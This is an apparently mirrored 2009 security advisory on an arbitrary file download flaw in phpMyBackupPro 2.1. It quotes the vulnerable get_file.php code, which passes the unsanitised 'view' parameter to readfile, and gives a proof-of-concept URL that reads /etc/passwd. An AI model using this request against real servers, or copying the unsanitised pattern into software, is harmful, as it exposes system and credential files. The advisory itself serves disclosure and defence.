Lucene search
K

phpMyBackupPro - Arbitrary File Download

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 11 Views

phpMyBackupPro Arbitrary File Download vulnerability in get_file.php allows unrestricted downloading of files. Affects phpMyBackupPro v2.1 and earlier. Found by Amol Naik on 16/11/2009

Code

                                                ################################################################################
	Arbitrary File Download in phpMyBackupPro

	Name			Arbitrary File Download in phpMyBackupPro
	Systems Affected	phpMyBackupPro v 2.1 and possibly earlier versions
	site			http://www.phpmybackuppro.net
	Author			Amol Naik (amolnaik4[at]gmail.com)
	Date			16/11/2009
################################################################################


############
1. OVERVIEW
############

phpMyBackupPro is a web-based MySQL backup application in PHP. 
You can schedule backups, download, email or upload them with FTP and backup whole file directories. 
Zip and gzip compression, easy interface and installation. Many languages and online help!

###############
2. DESCRIPTION
###############

phpMyBackupPro is vulnerable to Arbitrary File Download.

######################
3. TECHNICAL DETAILS
######################

Arbritrary File Downlaod
++++++++++++++++++++++++

Vulnerable page		get_file.php
Vulnerable Parameters	view
Vulnerable Code		

---------------------------------------------------------------------------------------

// show the requested file
if (isset($_GET['view']) && file_exists($_GET['view'])) {
    if (isset($_GET['download'])) {
        header("Content-Type: application/octet-stream");
        header("Content-Disposition: attachment; filename=".basename($_GET['view']));
        readfile($_GET['view']);
    } else {
        ......
        ......
        .......
    }

---------------------------------------------------------------------------------------

The parameter "view" is not properly sanitized which results in Arbitrary file download.

++++
POC
++++

http://localhost/phpMyBackupPro/get_file.php?download=true&view=/etc/passwd



############
4. TimeLine
############

20th Oct 2009		Bug Discovered
20th Oct 2009		Reported to Vendor
27th Oct 2009		vendor agreed to the vulnerablity and ready to fix it.
16th Nov 2009		No communication received about the status of the fix.
16th Nov 2009		Public Disclosure
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation